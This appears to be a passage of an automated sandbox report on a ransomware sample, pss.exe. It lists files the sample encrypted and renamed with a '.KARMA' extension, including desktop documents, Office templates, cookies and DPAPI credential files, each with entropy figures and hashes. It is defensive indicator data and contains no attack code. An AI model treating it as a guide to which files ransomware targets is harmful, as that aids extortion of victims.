Size (bytes):255288
Entropy (8bit):7.999364255656324
Encrypted:true
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\SIST02.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):251405
Entropy (8bit):7.999389953090911
Encrypted:true
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\TURABIAN.XSL.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):344731
Entropy (8bit):7.999504743812455
Encrypted:true
SSDEEP:6144:4XggeaS8zt2bzAjXsbs1oVKSyBLhTBBllJ/aBb/0p0+96DNXmIzRcf+UNBT:kgglzt2X6XwKp7laBb/l+4NlRUX
MD5:073928B9EE8C475907DD05DE23E3DD95
SHA1:340A730BA037B34AFD46E1EC6A008A861CED5B09
SHA-256:2B8D7FA489C81E5D1B8C81CC48274A2A1722216EB933406EEB3A27764A9A4473
SHA-512:1C3FF810C553372CEA4BC451F808EAC65AD554B9257E05E746D953318C135702845D0B12836A48C8617ADC63ED134A0D77DE2A538E61BFACFF571E3B6C946969
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1920069
Entropy (8bit):7.999912641515446
Encrypted:true
SSDEEP:49152:a8aM9kUFuvwabpj/T7YEpY97v4r1KYvUG/Cnb8UxaGkADDplvh:TaMWU4xiGY97K1KYdCj1k8Dvh
MD5:89C9E5FEC59D85C85888509692A0E8D1
SHA1:ED4F82C892E2A0DA76E3217D9CCBB538097B2801
SHA-256:F16457DC290B18CD8D50BA5770C3EF06DF4FD4BADD123434D0E73A10E091A4E9
SHA-512:D34454DB464E9CCE9247F2177BDA1677AEF3DF4021CF9AD0C89D66EC20C30F7B14B13D3CF8D3FACD6F99637B0472A58F866222178A4023F91B175436F5B3E351
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\MMC\services.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):92941
Entropy (8bit):7.997884392291508
Encrypted:true
SSDEEP:1536:Z3vYRNyYQSYwWEM3eLlLfHkZhP97e1YAZsaCgzRy4ThhXDDMBUtFKTJsSnvW5U+Q:NvMyYhZUuRfH47SjySjMS/eWmvWgsU
MD5:796271D8990E9EFE2EE327F5D04EBC2E
SHA1:B683D6689435C8E77C38DA62646AB1FEE2DE694A
SHA-256:DF90E4DAEBC045DEDB4F7B6E5A1F4F609E4BF79D80E17CC922A169BEF43DB66C
SHA-512:35B82066EA52B9A56EDEDBBD617308A51FF0B398DD380B171E123859B8C7B23882F8835187D49242EC1DB6C69699080DAA7BDEBD54A9517EF8D23663B7332B13
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.611935145089897
Encrypted:false
SSDEEP:3:h80auaTk6BPL74N7QTfTVR:fgk65LUUT77
MD5:A109BDE54DD86233806EA2C033109FA5
SHA1:FCD03F321C7BC63DE652EA4C680C40E4F7F5FE73
SHA-256:7BF26158BDDEE1438002E3F2C734FD468BF93CED21A30ED54AE62A583D8A86D1
SHA-512:B22060676D08A83257926268B770275F066D8DD9147B4C2D069B65241F0A19A062BBC48FDBBD7391C63BD180A7709AF8E4F532461887F2B8B199965EA05D14CC
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Office\MSO1033.acl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):37799
Entropy (8bit):7.99476165829671
Encrypted:true
SSDEEP:768:++Y/ErqYfl1uHBdfmlNioI1gJc7XIiEblDpZkeqyibJs4u:7YcqYLWbfmlNioI1gJaVqDpZkeqPs4u
MD5:C57D0D59C16142EEAAF24E2E5EF27E2B
SHA1:83060813D8905F8645F346E491826AB2345EFF77
SHA-256:A350AA9AAEA6B1C4EF5CFA904DCDB67673C14833665AAA317AC0769DFDFCFE00
SHA-512:A0C8D1D78DC06AF8B16AA7A552A0FAD210EF9C01550D01A29AF2CAC62DF6154E528532ED8879476915BFB7477A6CF9C01090355395CD70B3F26C50CFBF342A77
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\Office\Recent\index.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):97
Entropy (8bit):6.2132141308023225
Encrypted:false
SSDEEP:3:+//fxhNbfgQ3By4iCqyF5uRg1jUKbTGOTfdWTn:+///SQV5t6ETfdm
MD5:007BC1831FF05EEE0EA81BA30DF030F0
SHA1:040A99AE793871EF8216DFCCA5CA5ED4AFE4A061
SHA-256:926485480827286A97FD280706F1E40E241C09BA4963F39EB2189CD79807741F
SHA-512:BAE1CB9B18C31873CE3C8F88A8744A3D6477B468BFA394995A021E9A3FAB6AE97F6FB1D056A674FB7A83A5554ED151F380A40BF2D23EF7ECD10AB8742F85A1F7
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Protect\CREDHIST.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):381
Entropy (8bit):7.451231587691226
Encrypted:false
SSDEEP:6:Akcpsld8Bd4LUrF6OuJFdRhj8lq1OJPD+y03Lp6hPypwrV/lOfFwny8vPFmviu/G:AkKsld8ELUJ0JFd7AoOJKyE4hP7rPQFc
MD5:D702FA9B4E3C28A5D47B763C15DA78DF
SHA1:A48A0A8F0A24A75DB47080274E88152F1FB9489F
SHA-256:4D1E79597DAB4CE91F136F868D332675CD5062C3B66D41C94DAAFB53B8A97451
SHA-512:0AE0881E5A647709BAB0C4D81DFC15FE4C75535A523C80460B94823325FCAB68DED7CBA31135580EEF48581FC124AD56C79C3DCD4FCCF084EBAC224013771037
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\8a95f74b-deb7-4d33-9ab4-dd6c9dcc72dc.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):537
Entropy (8bit):7.600491554827822
Encrypted:false
SSDEEP:12:0gjBzrRLiozkfUxpL2uydgi5kvNC2Bv373UQSbp:HjBzrXz0UT0Z5yNBvs
MD5:43A0F50AF6D618CC163AE8D344553D8E
SHA1:7A97ED6BADD66437DD2F87AEAD61D0E02D2FEE14
SHA-256:24E5B73E6A8BFC9D9419D9B0C7912BD813C22E6A66CB61B2869BD063C58DF044
SHA-512:45FE7335218E6F7CC855D750CCD4E76E54DCFC439380F9C69602E12AB386B7166B7165C8AF82B13074267BF41B282E1D4137AE8C909C45B33639350805B1F5EF
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\Preferred.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):93
Entropy (8bit):6.062120875875773
Encrypted:false
SSDEEP:3:jvpsMeWaDlS666tsOH0SetH4eXy01n:Tpsfn5S6IcOH4s91n
MD5:86C072C5C1E6493EECEB8793F89EE7AC
SHA1:E8A9464972DAACD49D8F471467DDD3744D090BA4
SHA-256:A7DB8AA88707BD64BB6812DA05412E436E2E38220BE44B46BCF00021124E67CE
SHA-512:720E76CE75DC66EB7214BA99705A158756E33059F48C46FDA506F2C5302BF0AB957B9C6E6F598209BA0FDE595EBC763370B2F45E2DB0A78109329E3F56CF9810
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\b5958470-8ce5-4bb4-8d3a-2c85a109dae0.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):537
Entropy (8bit):7.61202645802131
Encrypted:false
SSDEEP:12:EbyIt641a8adneLF1W7ElOmyeEDeGjDSKWKw4h7HHdzKlOUq:iyIL1axARSElOpeGfCKw4h75R
MD5:E5950051B096030609808B7BA7448C4E
SHA1:B960AA9237FF3D35CBF0DE370AAF8BC9D14F1482
SHA-256:43A8BCDFF428FCDD892224F21808E6D6309447E86894ED733FCD7C5BC4F131B6
SHA-512:CADEC9C4EBA847DA0670F82B3337447F20CEC724ECDC96B34EE179C7C4C535B7001BA20264A80BDA037F6A0421A684754096573D71B77E8D87B80A0092A43804
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\f46745b7-7051-49e0-b579-fcf31786d9fb.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:PGP\011Secret Key -
Category:dropped
Size (bytes):537
Entropy (8bit):7.535032634267722
Encrypted:false
SSDEEP:12:VKFJfB3y4MdiiUQK/Ms/9VHIzlUbqDsdMVLTu8UmX1gm2B:myRIn0iq/DxLSxmlgmi
MD5:C508A3CFA7DA0D50B66C772A1060C498
SHA1:D2D05B745AEF86F03EBD2E5FEF473DA296ACF71D
SHA-256:5F760A87B226DC4E7321B5AC13690BB4C4299AC22B111F11D7443ACAA9DB7F13
SHA-512:51A45A3FF2043F49AF2404717B61FA89284C86B398AC704A7269D4936D1D3E48C432CBE0544D1DCBFF12E8AF29723BE6D12AAB6B4522AD84870313BDBA8701D0
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Protect\SYNCHIST.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):145
Entropy (8bit):6.699842603984348
Encrypted:false
SSDEEP:3:5YaJ4In/qUncOLys6s0oBPzvXyHxjMDn+AUWCDUYp814N2:5YaJ4In/pc46s00PSjCNiiA2
MD5:F77CAB5D019D1BDE5319A4B343B6107B
SHA1:94F87E67B099B784040508AF35EA7538F27739ED
SHA-256:8BB899D684657193035823F8C7BC7BD03ACF8F1631DC3C0B883FCE7EE0365AA8
SHA-512:C185A5F45ED3AE1051E4402B74C3C7E52E0AFA70C00322A3C6A79FCA0669DFAF9AA1BE895755BE903F48C7BB85F82C9B0BF29C30C5E92EA6FD0FDBA5500BACFB
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Spelling\en-US\default.acl.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.705947471556413
Encrypted:false
SSDEEP:3:JxGftbYO3gzqBF27rpKX0fn:7GhBU7r/fn
MD5:32A927A5174DF3232BE15437D0237A21
SHA1:1A80B1D25C7B12C80B658203E86ECD437903B484
SHA-256:C0EB1AFFFB05ECF99AE6A52B3F0F4ABC8DEE230DA6B6AE60C39FF83142C33EA5
SHA-512:847A99E545AA1FD908CE5A888756CAA95AA3A6BE646AE7224DE3E131D42BD35736398E20E9AEDF85A487B58637BA716FAE92245C429E52D87470DD0B65A1F2A6
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Spelling\en-US\default.dic.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.716579689896742
Encrypted:false
SSDEEP:3:xmDw0xStpoJRk7SCn:I/CpUrC
MD5:72B214850DC595DDEB9DD240A10A4958
SHA1:942A01512C786C3A339F4A1E36DC5EAAA2690D0B
SHA-256:686FE8DE71BAC250809851F8E2B87145DFB880FEB7C2E79A16C8F2C37086064E
SHA-512:A93281C41C3758F5A5CCE72C39CBF73A8B7C60BBCB2FDD26195506D2E17DB01633317EEFFB64838BC38FF777FAE6477DB47C868BB4AD439872CF63AEF5EF93D0
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Spelling\en-US\default.exc.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):71
Entropy (8bit):5.721488359553034
Encrypted:false
SSDEEP:3:LJUNRhErD7FGPV14zJ//70n:9UbI1WX4lX70n
MD5:35A02926A5A93E473BB5762D8838B85B
SHA1:22769C39120F52297D091EFB8F7D8BA01A570B00
SHA-256:121381FAA470B21EE85CE710B5B1BD421D7C61BEA0C7DD2DEB239E830893CCF1
SHA-512:04B3747887C3AD90C85479821D8D418291B46113A4E0DF833BA68CCF1675946E7D3F08FD0B854D6786ACE7035B4C9DEC3F3143C4DE2464DA25D6999595708ABF
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\SystemCertificates\My\AppContainerUserCertRead.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.669906159582652
Encrypted:false
SSDEEP:3:9KUWaVIXOEl0od9OWj3mUF:9kaGzXOWjJF
MD5:047DB9AAF20A2D05E51B31680F9123A6
SHA1:AEAEB2A3CCFB1ED0FC3F7B3BDC59DDA0EED9CC8E
SHA-256:2DC2D8EE5D1D6CE9EFE069CCCAA8711CC8356DB14E14034CB18F9AD938B3C96C
SHA-512:21F0E286DEC012773A24D885CF952A8A31FC80A1D026B9C256DE95FD4B56C3479D8D7B035F3D329679F2F66B0A801DB5AF386E0C8BDE6A221B8BEA2781769BE2
Malicious:false
C:\Documents and Settings\user\Application Data\Microsoft\Templates\Normal.dotm.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):18007
Entropy (8bit):7.990131636127572
Encrypted:true
SSDEEP:384:8FBhkci1VuREP3oVfdQnBQ6bNWUSBU61tyDvPQ8w3kjkya4z:chkci1IRg3oTH6JSW6iDQmLa4z
MD5:31E5361B11127C3DDDBEAFC7034F5E54
SHA1:745632C46BF910D50C7C858CA68E96B7A4F27FCC
SHA-256:349360670ECAA86C5D6EF6342FA580EEFA0A366FC4C3B879D30DFA6330BD86C2
SHA-512:B745C75E75BEFBDA02AF5617E3968D98024CA3BE73C2F1DA98E7007647FCFD3210CCAA8E815BDEEE84A640B040FA1F2C2767FB9ECCA9C7803DC485C4E940A1A2
Malicious:true
C:\Documents and Settings\user\Application Data\Microsoft\UProof\CUSTOM.DIC.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):89
Entropy (8bit):5.918321740242394
Encrypted:false
SSDEEP:3:+q1RGG6OOpsTWuP+0qgeFH+EjWCT1TZn:+WgtOO2TA02FTqOn
MD5:68132C15654BA5EF2B549D059197905A
SHA1:6068A786D8EE6092A3DC4753CC75B472395B8A0A
SHA-256:9A4CF16C5831D71583AB001304DCAE8D00B7C3D72DD53B55AFADBB5268864ACA
SHA-512:0404F84536F9E7C0138426FAEB9D797D1B1031F9CCAA1FA096CAC3E9A57B1C26941786CDE12370A774B757CE36D3DFE19D90E49DE3AB3FFA8BF8A27D2B4727F8
Malicious:false
C:\Documents and Settings\user\Cookies\DNTException\container.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.546859420514927
Encrypted:false
SSDEEP:3:F+jje9WJdw1lR1v8PGS2YRk/rJ:F+Y68/
MD5:5B499BED35FED7243509F451A75928E7
SHA1:5FABF5457BE665924EFD0345849A8E713EDC1F01
SHA-256:828D1258E9D7E635A146E99305A030D7080B24921437D874F962E9557B662FF8
SHA-512:294F2342BE760D021E47337C451BACE54888FCE29DC7A4F468A6AC589EF0889C0AB28D4D97E429A710988F23B37B3A7BDD7C936DA150F5C3F211A5B4A6B4C843
Malicious:false
C:\Documents and Settings\user\Cookies\ESE\container.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.600994746507819
Encrypted:false
SSDEEP:3:7CHl/Kx+VqtM0115:Qli7M0r5
MD5:E0A45DCCAA9B437A536F14824F97A152
SHA1:BA550F9FA20C67569823FAC2931422EA62AC5B17
SHA-256:6A559727651492A2565DC8B3886AD98277012C99550F1776D392A4C62C913B6D
SHA-512:03139DC5358EDFD0CD55959AD5F718FB7AC0F3AA145F73EC5DD046A6F4DBF5D52F7B96C13AC2E7428DBA6CE350AD744CA7FA9A8311821F5371DFA9BA020ABF8D
Malicious:false
C:\Documents and Settings\user\Cookies\Low\ESE\container.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.737370247003717
Encrypted:false
SSDEEP:3:TNavKfB6lGAZkolOKupk35:TNavE2oKJ
MD5:02B7046153A5999A7407DA486AAFBF80
SHA1:D0F479A6D0D8CE262EB5C3DB9EF20470EDDA0E9B
SHA-256:C42CF58ACF126C010107B40A6EBD3504ACDA5B01FD89F159EC9C4D43C3DF0748
SHA-512:78C6D29BB76FEAAF95DD682C13235BC13F994418347B9DDB86601A8BB46FD14F0B7591FD97006CC967F1D332FB08F312EA603394EFD376C1D7B3EEA8F227AABC
Malicious:false
C:\Documents and Settings\user\Cookies\container.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.640920652336276
Encrypted:false
SSDEEP:3:9JT4o8cD7aYB9dT9:rT18JYz19
MD5:E51761D4EAEB7C232441C672460CC10F
SHA1:8C33F89BE3A2490024AA3199415C92638B0B1D1A
SHA-256:1AFDAE05A0921A5E4F6F314600C0586E028DBD748A49067572090AE744198472
SHA-512:1CA48BB3C72C801E95FC8723768C68C620654D68597748EB31860DBB7BA7EDD33850B6217FBB056300A8DF45E7F6A89254EF6681B1636F50BDE1ECD58EF1A067
Malicious:false
C:\Documents and Settings\user\Cookies\deprecated.cookie.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):160
Entropy (8bit):6.663016082604735
Encrypted:false
SSDEEP:3:pqGGJSezV7JTlQGv2B7XSS+z8EQWy1NykjlG8GFPdpUcZ8MFBoflDKp0n:kGGJSezVPQeXS+4EQWClU5FNFiNC0
MD5:C5FFF037728FEAA3C3B1828E31E766BC
SHA1:CFCB22ADA29D280B28B5DC3C7127F3D96D34DEAC
SHA-256:B8F60BD82CCE7E6E946B4B4A389ED3E584102B481C14D689923FA6988CC21C99
SHA-512:865004CB32567870F62ED3BEB5CF38740A3D1779DE8C0CEF1FFAB75ADB9B73632A30BBD73A6236C26C20BB21F2EB770692F10E634C3282C5D8BA3FA8B8335FDE
Malicious:false
C:\Documents and Settings\user\Desktop\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828524406961908
Encrypted:false
SSDEEP:24:daSZxA3anfv40RULHTpiwec06UmGdKaayO5/106xsqmqrG2OQ:daSZNfvEHTARc06iKaayuG6ujt2OQ
MD5:DF49D05C4F5896C23935E857901144C6
SHA1:873592CC55E5D3BF80D1F6A88118BDEF2FC2A1D5
SHA-256:DC071EB24D1EA3DCB891DE552AF16EB9171CC47619F61A0FD85D489504B25060
SHA-512:8B7B49A74568E9AB1D5C83E1B4774879F22EA31A4DDFC20F7D7B4C358094AA7DBCA2FB0EE8A9CA430FA41A2A85490ED33B302413885EE2E985D1F519E7306FE2
Malicious:false
C:\Documents and Settings\user\Desktop\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.777045896477449
Encrypted:false
SSDEEP:24:2A7Y3u0jKZaXqdbQt4OTxJ+N4ThndhUu207KxZwjob3:tYvjKZa6BKj+NYrUJ07KF3
MD5:9D14749E0744BDD2900649AFEB8515C7
SHA1:3A31461658BF8D101129DB9E3E52CD171473E0BC
SHA-256:210452686AF3D20653C10952E2D8A49CED49137D754B5D9DF0D777DD92574C8F
SHA-512:316E6DF01F6DC9BD10B4C3ACAA9F80554A325007B893292A0D89F4181E1213BE9589CDD99E03DDC8DA74C41D39939BE164AE0DE4B540A17EDFCEDE901E921D78
Malicious:false
C:\Documents and Settings\user\Desktop\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.792133753040234
Encrypted:false
SSDEEP:24:TUwxDgWdiPHdjNOyaQlXq7YOBsU8wOiHoMxlsqCMBzrWKIT:Awqy8OYXk8RFMxR5WKIT
MD5:B97349C71E967336930D9C60296EAE81
SHA1:8B6D5D425295C3172AAACE42FD162EBE3E3BB199
SHA-256:E64BE070F3EBF1262347D720B385F29F59332D6436DF022861CADA90D8A70C88
SHA-512:A99918694F6F6D8994C0922317C111383ACF49E3492D478DC65FDCDB6AAE61416806B4718AAC830C745359C37A62067E924706A150A9CFD24115B351E9FCB02C
Malicious:false
C:\Documents and Settings\user\Desktop\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808408298574005
Encrypted:false
SSDEEP:24:i9gyeCSCVNPvQPzCXrzQykbDOEuxWw8aJwfi0zg:i9rfPILCYyADO4w8aCi08
MD5:7C3F64A08192EAAC0FE31FAD5F5FE17D
SHA1:294CB6345580378CAD00AD0FF735C71348D6C5E9
SHA-256:5408885F34B002A2BF7F62D1B640DEE2E5A83FEE27F1D608B2C27CB468E5F0ED
SHA-512:CDBBED517E7C0C3BD14D966C15E76482326371F0214D119B1041422973F250CE34AABCA26656EF00095A7BB186E8DDE628AB72C64452C5E7AABD311FDCAC6985
Malicious:false
C:\Documents and Settings\user\Desktop\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.825390699299319
Encrypted:false
SSDEEP:24:fYj+1UAwKmdyUAS8I6E0V45yMuDdIi4BqaJr+WJAxIgOqp:fYjSU20yUAZp/yiS+NxImp
MD5:70B8753BB43F5B239F176592C6175819
SHA1:77D81D9BB7AFF498564555BD638A331B33F9FCC6
SHA-256:5CF6FEED893D7C145014012899C0A8CE929A392729B775E655C4E1B73DD0FBBD
SHA-512:7AADA4CEBE30E13E5E5A592FB604D85AFF978787D1E2D04FFDD05DAA114F51D7409A16CBD9BE502A7C62C493D2476D4E43B9EE574AD4726B5961E685EF8DA00D
Malicious:false
C:\Documents and Settings\user\Desktop\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822077045349632
Encrypted:false
SSDEEP:24:r0WgD2WEXt0jLh/oZ+f6/d5E7+zpMmbv7kj/P3xOWp58t0Y:YWgTbjLe/rEyrDkpi0Y
MD5:18762232B1E12D3B57BF1672262F1C30
SHA1:AF05AF0017AE501FD7161016A193FA6A38994A1A
SHA-256:FD65251A41BA0D978B57AAEAB4BEBB9626950E4B21432190DEF47A13E17BC625
SHA-512:84A4C2047BA0A23BE3B65988AD8C9AD8E8B13CD5DC6E59070A4DB25A7ABC5A660E23B1765840D174EE8258CD8FDA605001E4483640FA6BFFC517DB382E2A8C39
Malicious:false
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8026531878921945
Encrypted:false
SSDEEP:24:5g1h7d4FX6FJIcQaPDOZL6FpnuBKHyL6SXkMx6EWmpf6VS4:5gr7dcKFWcFKZLEnuBK1SXkMdWHU4
MD5:57E5A8A0B4D0F8ECB16D63E4F403411C
SHA1:C94126ACA4FB4642750D00B1977EF8448489BA77
SHA-256:418B82E5B2D93FF9A08989319EAA262EF6E63A540C2384F63953FAB6F208C36D
SHA-512:9DF0669F44697CA0BDF3D1E98FB159B72005957BDD3CBA26EB47E79FDE19557E8566F1E0AE66F4BFA62963F55BAAE4109D20C227E9D27010C2456B10A093B945
Malicious:false
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829657089271315
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82408303678608
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.848759370626013
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.781654596856385
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805283204109685
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819085524610789
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.794045729889145
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8058274128306415
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PIVFAGEAAV.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814709505401737
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813496593107111
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8171099113409985
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.812082298645967
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814750325268285
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.817306123264909
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832821038591339
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822508114103896
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828951016468186
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.849687165675415
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.811695096551344
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822506072907368
Encrypted:false
Malicious:false
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.809728846675135
Encrypted:false
SSDEEP:24:uos26K2NeHJgp3CVLN11m2Ar3oFt6WMm9toL7zuD2:11w8pgpyVL9AD1s9toa6
MD5:F9EA9DC08E66C109E27CB43302F09720
SHA1:CCEE9CB0FF61A3688B7609606056AE412EFACBB8
SHA-256:0812A78EB76CEB97B92BBAF7EFEBB55E3CBEE04ECD9D5B0F246AB2D05037033D
